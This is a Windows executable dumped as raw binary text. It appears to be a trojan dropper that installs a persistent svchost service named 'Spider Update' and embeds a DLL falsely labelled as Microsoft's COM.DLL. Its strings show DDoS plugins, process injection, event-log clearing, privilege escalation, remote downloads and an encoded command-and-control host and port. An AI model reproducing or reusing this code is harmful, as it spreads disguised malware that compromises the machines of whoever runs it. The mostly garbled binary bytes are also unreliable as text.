MZ@ !L!This program cannot be run in DOS mode. $=[\i\i\i@e\i6@g\iCc\iCm\ivS4\i\h\izb\irZo\iRich\iPELkeM  6 @ P@ .text   `.rdata @@.datad0@.rsrc@@@QSUVt$W3ID$Q| @D$~D$GPOQ<=u D$P|iG<=u>D$@D$} UE} ME}]EG[&L$uPA|؋D$_^][YËD$+VPx @T$$_^][YÐ 0@0@tT$:t H@u-0@ÐQL$D$PQD$D$ Ujh @h0@dPd%SVW3ۉ]]E $@EPMQSh?SSSU REP @MQhSU REP$ @U;v+RMQRSUREP @u3QVRSMQUR @ug^EPhSM QUR$ @uIEPMQ @u7.URhSE PMQ$ @uUREP @uEEEMd _^[]ËMQ5( @֋URË@@f@@SUVWh 2@\ @=` @h1@Vh1@Vh1@Vh1@VD$ h1@VD$h1@VD$׋L$,t$(D$ D$0PQVՋu_^][WVӋu_^][ËT$4jhjjjh@RT$4؅u_^][ÍD$jPWjT$ PUST$(3X(L$jQWjT$ +P.PST$(FSd @UT$$_^][ÐWjjj @t2D$SVhPW @ @tjjV @VW^[_Ð SUVW3|$D$fD$Ph?jh 2@h$ @t _^]2[ ÍL$T$QL$D$RPjh2@QD$, @VP @t T$R( @D$$ t$t$= @T @UVӅt}jV׃@>uX @UӋȋD$э|UӋT$UD ӋL$TL$D$RPjjh2@Q @T$R( @VP @_^][ Ð S$ UVWS- @AD3@|$S$h2@PՃ h?jj @u _^]2[ j$ jjjjh2@jjhhQSV, @u _^]2[ Ë= @PVS$h2@RՋ$, =X @ jVPVj$$ht2@Ph$hh2@Qh @T$jRPD$Pj$$h\2@QhtT$RhX2@jej _^][ ÐX0@SUVWP333D$ h03@V @ = @j|V׃u_^][t$pj|V׃u_^][t$pj|V׃u_^][Xj|S׋u_^][D$ttL$hQS4 @FT$VRh(3@hD3@ @|$$\$(D$h3@8 @P @u"u:Fu:t<"u>"uFu:t< v]ЍEPl @EtE> vFuj XPVSS\ @PEP @E MPQYYËeu @% @%t @hhYY3% @8###|#l#Z#H#&###"#""""~"v"`"P"D"8"$"""!$^$####$$&$.$<$D$N$$j$~$$$$$@t@@h!"4 4!# !$t 8###|#l#Z#H#&###"#""""~"v"`"P"D"8"$"""!$^$####$$&$.$<$D$N$$j$~$$$$$lstrcatA1CloseHandleGetProcAddressuGetModuleHandleAlstrlenAlstrcmpiASetLastErrorsGetModuleFileNameA>SleepReleaseMutexhGetLastError\CreateMutexA GetCommandLineAPGetEnvironmentVariableAKERNEL32.dllUSER32.dllRegCloseKeyRegOpenKeyExARegQueryValueExARegDeleteValueARegDeleteKeyARegSetValueExARegCreateKeyExA?StartServiceA>CloseServiceHandleOpenServiceAOpenSCManagerAdCreateServiceAADVAPI32.dllreallocmalloc_except_handler3strchrsprintfstrstrMSVCRT.dll_exitH_XcptFilterIexit_acmdlnX__getmainargs_initterm__setusermatherr_adjust_fdivj__p__commodeo__p__fmode__set_app_type_controlfpGetStartupInfoA_stricmpABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/1@\0@c3ZjaG9zdCBjbWR8c3ZjaG9zdCBSdW50eHp6IE9wdGltaXMgY21kfHN2Y2hvc3QgIE1pY3JveHp6dCAuTkVzb3JrIE5HRU5OIGNtZHxXSU5ESVJ8bWwuZXhlAA==ssssssssssssssssssssssssssssssssssssssssssssY2MuYW5xdXllLm1vYmk6MTIyMjJ8anNwAA==hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhFreeResourceSizeofResourceWriteFileCreateFileALoadResourceFindResourceAKernel32netsvcsSOFTWARE\Microsoft\Windows NT\CurrentVersion\SvchostDLLServiceDll\ParametersDescriptionSYSTEM\CurrentControlSet\Services\%s%SystemRoot%\System32\svchost.exe -k netsvcsMACHINE\SYSTEM\CurrentControlSet\Services\%sInstallModuleSpider Update%s\%s1 8ePh@~HDLLMZ@ !L!This program cannot be run in DOS mode. $!eݞeݞeݞўgݞӞgݞ ֞dݞ מaݞ ٞaݞeܞݞnݞS֞oݞ۞dݞٞdݞRicheݞPELbeM! LY`@PoX0e 0`.text:KL `.rdata`P@@.datap `@.rsrc l@@.reloc 0 r@BV3F FFFPb`^ÐVD$t VG^VFbthjP`Va^ÐQSUVsVt$`%l$P'uV`^]3[Yt$͋W{ȃK͉KL$Q`_^][YQSUVsVt$`l$;vV`^]3[Y;v {t@s͋W|$ȃsC+ō .PQV@aCt$ +ʼnC_.PV`^][YA ÐQu3ËA+ÃSUWL$;s _]3[L$ D$l$  b$DaFj hUj`|$ u _][VssȋщD$ʃK^thjQ`D$L$ k _CʼnK][SUL$;s ]3[L$D$ l$ b$DaHE ;s ]3[VWjhUj`ˉ|$shjKD$Q`D$T$C_k ^S][VW~W`FhΉFW`_^ÐAL$jhjZdPd%Vt$N&N,DŽ$NTƄ$N|Ƅ$D$ bPhajjjj`D$SD$pD$iD$dT$D$eD$ rfT$nfQƆdžA$^d ĤÐVD$t VmC^jhZdPd%QVWt$bjPD$Ɔ`t=`Q׋RaN|D$NTD$N,D$ND$L$ _^d Ð VWDP`Ɔzttt _2^ jjjau _2^ zth zL$,Qau _2^ zfD$t f pRD$0PafD$O jL$QRD$(au _2^ D$jPjhQD$au:PT$ PRPPD$ j PhQD$0D$4 D$8ajjVhjjƆ`_^ "FAS$"UVWˉD$D$-aAt$$jj$jQjatZ~;3$P󫋃$h RPՅ~+$PQXAu_^]["_^]["jP`ÊÐUjhZdPd%E SVWىe]EuMd _^[]uBuȍ3u1s|dj΋9WPM_^d []PEKP& vj}܉MfPfU@UE3tMhhcQEXp?jEE%;EUjREjPMyWR?؃uUhhcREHp:?EWSHMq,WS>j΋UWPRS>]uNjj)ÐQVD$jPhhQfD$fD$aR`jP`QaR`dž^YÐQSUVWt$^T l$ưE jVˉD$$L$jQt$UVU=͋щD$D$ʃp||$UWt W;=t$h PjP4_^][YjW\n|BjWH봐S\$ UVt$W|$;ދD$rLD$jVWPaL$AL$|݃|$tPL$j L$`+;s~&3jSWQaF|tD$D$L$;t_^][ D$SVW@3|$ D$ jf hD$jPjhdphQL|$,3 ItEjPPjhdphR}!=``3h׍D$ PӅuF|_^[ÐD$VPbƆ^VD$t V=;^b%SUl`VWVӃu jV`l$$EPhPhpVaM3퉏VӃUhjUjhV`u"T$$jRD$,D$-_^][D$PU`U`3;u*;u"L$$jQD$,D$-`_^][33UhT$j3UT$(jD$)h@T$4VD$0D$5`u_^][P`L$j Q_^][SUVW|$(jhojD$4jjh@PD$0`L$(jQUS`D$,T$jROPQS0`S`D$T$(L$j QD$ T$!D$%H33 Á ;|;so| we|$5LahqWփth `R`hpWփt%jjjPhAjj3 L}_^][SUVW@3|$D$T$fP3+O͋$l$+RO̓D$P`L$D$Ql`u T$jRD$_^][D$jPD$_^][D$V3ɊK$!jV`^jj@jPhp# jj@jPh`"jjm2 L }A L^@P^L$ @QPG^@Pz^@jP ^@jP ^ ^3ҊPR ^@ PV- ^@ PVH ^jj@jPh)jj1 L }Ajd L`^@Pqt^L$ @QPa^ :!*!e!z!J!S!!!!!!!   !!!!! !!!jhZdPd%L$,pL$PhPDŽ$u.L$DŽ$$d L$Q$L$Ƅ$$Ƅ$5L$DŽ$$3d D$Pl`ujjjjh`"jj/2ðÐdSUVW3|$D$󫋬$xf3+T$T$t3h(q@P|$xU q+ًOˍT$||$+ًO˃`aL(NtD$tP-a:u]L$hqQՃuJT$tR`hqV` pjQhPЃ V`_^]3[dT$tR`tlhqW`D$hqPՃu pjQhPփ pjRhPփ W`D$hqPՃu_^]3[dSVW?3|$D$fP3T$+D$3Pы$ID$| $Pʃl`T$L$jRS _^[ÐVW?3|$ D$f$ L$PhPhpQaT$R`t"hqV`tjjjЃ V`_^ÐPSVWh\q@`=`hLqVht2hVRhhsPjVӃ @uɍ3+ы}ʃSEEPMQURSEPQpu1(U UEPMQURSEPQpuEE!Q`E܋Md _^[]ËURhPhE<E<X=-===<Ujh@bhXdPd%SVWhp`؉]hpS5`֣dhpS֣phtS֣lhtpS֣hhtS֣thpS֣Th4tS֣`h$tS֣X3uuE $?EPMQVh?VVVU REPlMQhVU REPdU;v+RMQRVUREPTu3QVRPMQURTug^EPhVM QURduIEPMQ\u7.URhVE PMQduUREPXuEES`EMd _^[]Ë]܋MQhURhì>>T??D$L$PQ\`ÐD$L$PQ``ÐD$P`Ð%H`D$ L$T$PQR4`Ð$V5ahuhPhpPփL$hqhPhpQ֋$5l`u$Rփt{D$PփtoL$Q`uP`3^hqV`uV`3^pjRhPЃ V`3^VW@3|$ D$󫋴$fVhPD$hpPaL$Ql`t.T$R`t(hqP` pjQhPЃ V!_3^QSUVt$W3ID$QhaD$~D$GPOQ<=u D$P|iG<=u>D$@D$} UE} ME}]EG[&L$uPA|؋D$_^][YËD$+VPtaT$$_^][YÐ TtTttT$:t H@u-TtÐQL$D$PQD$D$ ËD$L$PQaÐVt$W|$jVjWjhprhP t VW_^Ð4VW 3|$ D$ jj2D$jPjhxrhQU T$R`u)=+|$Dȃ_^4Í|$3t$|$DIʃ_^4Ã4VW 3|$ D$ jj2D$jPjhvhQ T$R`u)=Pt+|$Dȃ_^4Í|$3T$DIt$3S=Pt+ًO[_^4ÐhUl$VW=a3VD$xh0vPD$jjL$ jQj$h(vRhD$8,tFUVD$hvP׍|$ 3+ы$xʃ_^]hÐSUVWh|v2`h`vU`3uD$j2PL$LjdQVׅF |U`_^][ĘÐW@3|$D$hPfD$hvPa$$QRJ_ÐD$V5p`PD$օuL$D$QօtD$u|$r ^Ĝ2^ĜÐLVWM3|$$XfD$D$PVL$PD$PQp`$\3҉T$ D$T$L$ T$PT$QRD$aD$$ j2QV$$RƄ$>+$>$`$@H`$H$DQVT$h8R'_^LÐD$ S\$ Ul$Vt$WVE`GWϋj:P5\aփ u_^]2[Íxj|W֋u_^]2[WxaL$ ~3}IuEv_^][ÐSUVWh\q@`5`hxP֋`hxhlxPh\xD$(hHxP֋jjuh$x_^][ĴÍ$DŽ$(PV}uh xY_^][ĴË=a$hwQ׃u!D$$T$RPx`t9\$t$QVt 뵋$t$T$RSչ3|$PVD$D0D$HD$TDD$LD$\wPhD$XT`L$ QhW`5`uPhw|ahwj T$(Rhwj`uPhxw|ahXw9 D$(L$,T$D$4D$ RjjjhPD$HL$PD$T`֋L$jSj Q`D$3SST$8jRSP `uPh4w|ahw =uhv|ahv L$jT$QR\$ T$0t0\$ x$hPQ`$hR$hvPaD$$L$@T$PQRT$SPUSS$SQSR`֋5`W֋D$P֋L$Q֋T$ Rhv 3_^][ĴÐVjjjhhMjjjV`V`3^Kt rahjhxatPaVt$Vhpha"jVjj^(VWj`$<3Iu,yh@L`$0VPL` DtQ0hhLthP]SUh\q@`=`h yVh4sVhyVD$hyVD$ hxVD$$׋DtRjj|`=D$ 3+$Ph3R Lt$ p@Ƅ$fչA$P$hxP5ahphPփ$hxQhphPփH`PhxT$,Rjjjjh@jj L( }A LL$X-`D$D$t7<t33D$$PjhӋujjLjZjfjxjjijjjjj kk*kiviji^iRiFi6i iiihhhhhhghh~hnhXhJh:h*hhgggonnn nnxnpnfnXn@n"n0m@mJmRmZmdmxmmmmmmmmmmmn6onNkZkjkkkkkllkk4 9nts0P? 22 4P4=?boXyXbpbyxb b@ZNZ\Z bZZZZ(p8p8ccXc ccc cZZ  d0dHd2 xd[ ddd8 de e2Se@k0`Lg,lae"m`f4na|gnafoaHl8ljlllllllmZliiiiiijj*j>jLjZjfjxjjijjjjj kk*kiviji^iRiFi6i iiihhhhhhghh~hnhXhJh:h*hhgggonnn nnxnpnfnXn@n"n0m@mJmRmZmdmxmmmmmmmmmmmn6onNkZkjkkkkkllkk4 9ntsInitializeCriticalSectionDeleteCriticalSectionmVirtualFree@LeaveCriticalSectionEnterCriticalSectionjVirtualAllocKCreateEventA1CloseHandlezWaitForSingleObjectlCreateThreadResetEventSetEventInterlockedExchange'CancelIo>SleepFreeLibraryGetProcAddressALoadLibraryADeleteFileASetFilePointerOCreateFileAsGetModuleFileNameAhGetLastErrorKLocalFreelstrlenAlstrcmpiAlstrcatA[GetFileSizeGCreateDirectoryAVGetFileAttributesAWriteFile^MoveFileExARemoveDirectoryAFindCloseuGetModuleHandleAbCreateProcessAGetTickCountlstrcpyA;GetCurrentProcesstOpenProcessGLocalAlloc]MoveFileAGTerminateThreadoCreateToolhelp32SnapshotProcess32FirstGetVersionExAProcess32NextProcessIdToSessionId\CreateMutexA2SetUnhandledExceptionFilterSetErrorModeFreeConsole>GetCurrentThreadIdKERNEL32.dllwsprintfAExitWindowsExhSetProcessWindowStationOpenWindowStationAHGetProcessWindowStationCCloseDesktopySetThreadDesktopOpenInputDesktopfGetUserObjectInformationAaGetThreadDesktopOpenDesktopAUSER32.dll=CloseEventLog9ClearEventLogAOpenEventLogA_CreateProcessAsUserAAdjustTokenPrivileges<SetTokenInformationDuplicateTokenExMLookupPrivilegeValueAOpenProcessTokenRegisterServiceCtrlHandlerA:SetServiceStatusADVAPI32.dll??3@YAXPAX@ZmemmoveAceil_ftolstrstrI__CxxFrameHandler??2@YAPAXI@ZA_CxxThrowExceptionstrchrstrcspnstrrchrmalloc_except_handler3strncatrealloc=atoiprintf_stricmpwcstombsstrncpy_beginthreadexMSVCRT.dll??1type_info@@UAE@XZU__dllonexit_onexit^free_initterm_adjust_fdiv(WSAIoctlWS2_32.dll??0Init@ios_base@std@@QAE@XZ ??1Init@ios_base@std@@QAE@XZ??0_Winit@std@@QAE@XZ ??1_Winit@std@@QAE@XZMSVCP60.dllWTSAPI32.dll_strnicmpbeMoxoooQMooservice.dllServiceMainrun9 :8Pb.PAXPb.PADbad Allocatebad bufferInstallModuleRegCloseKeyRegSetValueExARegQueryValueExARegOpenKeyExAadvapi32.dllSYSTEM\CurrentControlSet\Services\%sP%s%sAutoDdosManagerPluginKey.dllPlugin\.%s\%s%s\*.*FindNextFileAFindFirstFileAkernel32SHDeleteKeyAshlwapi.dllexelogon.win\com\syslog.dat%s\%d.bakDeleteFileAWinSta0\DefaultSpider UpdateCreateProcessA%s\%d.tmp%1ll\open\commandplore.exe\sheApplications\iexkernel32.dllRegQueryValueASystemSecurityApplicationHostGroupAdjustTokenPrivilegesLookupPrivilegeValueAOpenProcessTokenSeShutdownPrivilegeSYSTEM\CurrentControlSet\Services\CreateRemoteThreadWriteProcessMemoryVirtualAllocExCloseHandleSleepCloseServiceHandleDeleteServiceStartServiceAControlServiceQueryServiceStatusOpenServiceAOpenSCManagerAPluginManage.exe%s*.* [%s] RegDeleteKeyARegEnumValueARegCreateKeyExARegDeleteValueARegEnumKeyExALut@tABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/V2.0c3ZjaG9zdCBjbWR8c3ZjaG9zdCBSdW50eHp6IE9wdGltaXMgY21kfHN2Y2hvc3QgIE1pY3JveHp6dCAuTkVzb3JrIE5HRU5OIGNtZHxXSU5ESVJ8bWwuZXhlAA==ssssssssssssssssssssssssssssssssssssssssssssY2MuYW5xdXllLm1vYmk6MTIyMjJ8anNwAA==hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhsyslog.datCreateFileAInstallTime%d%dMHZ~MHzHARDWARE\DESCRIPTION\System\CentralProcessor\%dcapGetDriverDescriptionAAVICAP32.dll%sPluginDdosN.dlldefaultSuccess rundll32 "%s",run %sToken does not have the provilege Token does not have the provilege Adjust Privilege value Error Adjust Privilege value Error: %u Lookup Privilege value Error Lookup Privilege value Error: %u SeDebugPrivilegeProcess token open Error Process token open Error: %u winsta0\defaultwinlogon.exeProcess32First failed CreateToolhelp32Snapshot failed WTSQueryUserTokenwtsapi32.dllCreateEnvironmentBlockUserenv.dllWTSGetActiveConsoleSessionIdwinsta0Ӳɹ Spider %d\Com\Plugin\\Com\GetSystemDirectoryAGetTickCountReleaseMutexOpenEventAserviceProcess32NextProcess32FirstCreateToolhelp32SnapshotMozilla/4.0 (compatible)WriteFileInternetCloseHandleInternetReadFileInternetOpenUrlAInternetOpenAWININET.dllPb.?AVtype_info@@0H` $$4VS_VERSION_INFO?StringFileInfo`080904b0CommentsLCompanyNameMicrosoft Corporation(FileDescriptionBFileVersion2001.12.4414.7000InternalNameCOM.DLL> LegalCopyrightHrCg@b g(C) 2009uLegalTrademarksMicrosoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation8OriginalFilenameCOM.DLL PrivateBuild: ProductNameCOM Services@ProductVersion03.00.00.4414 SpecialBuildDVarFileInfo$Translation 00X0j0t00001&1w1122+2v2223C3z33344-44445,5555555 66*6N66666(7P77788G9O999 ::%:2:s;;;!<5<:>>>>>>7?>>>#>->I>W>>>>>>>?0000$0,080D0P0\0h0u000000000001111%2,2F22222323C3I3U3[3k3u33333B4c44444444445505?555555555566 6j666666667:7E7O77777778889+959<9z9999999:::1:7:A:Q:W:j:u::::::::::::::; ;;;;&;e;;;;A>$>+>2>7>?>D>L>Q>Y>^>f>k>s>x>>>>>>>?J?h?z????????@l000<0W0b000000000011#1*151G1O1U1b1h1111111111@233R3W3t333334,414E4O444444A555556#6*616\66666q777j8888 9999%9*939;9F9d99999K:[:n:t:::::::::;;*;8;>;C;Y;_;d;;;;;;;;>;>G>P>U>Z>k>q>v>>>>>>>>? ?6?A?s?|?????P(L0l00011!1'1/141:1A1N1m1z11111111112=2S2222222 333v3333333333334 444:4M4a4m4y4444445595b5t5z555555555555555556/6666677$7+737=7Q7l77777888$8288888888888888 99"9'9,919<9I9S9h9t9z999 :&:,:2:k::::: ;!;1;`p22222 2$2(282H2L2P2X2p22222222223 333<3\3`3t3333333344@4T4`4|44444445,5p00(080D4H4P49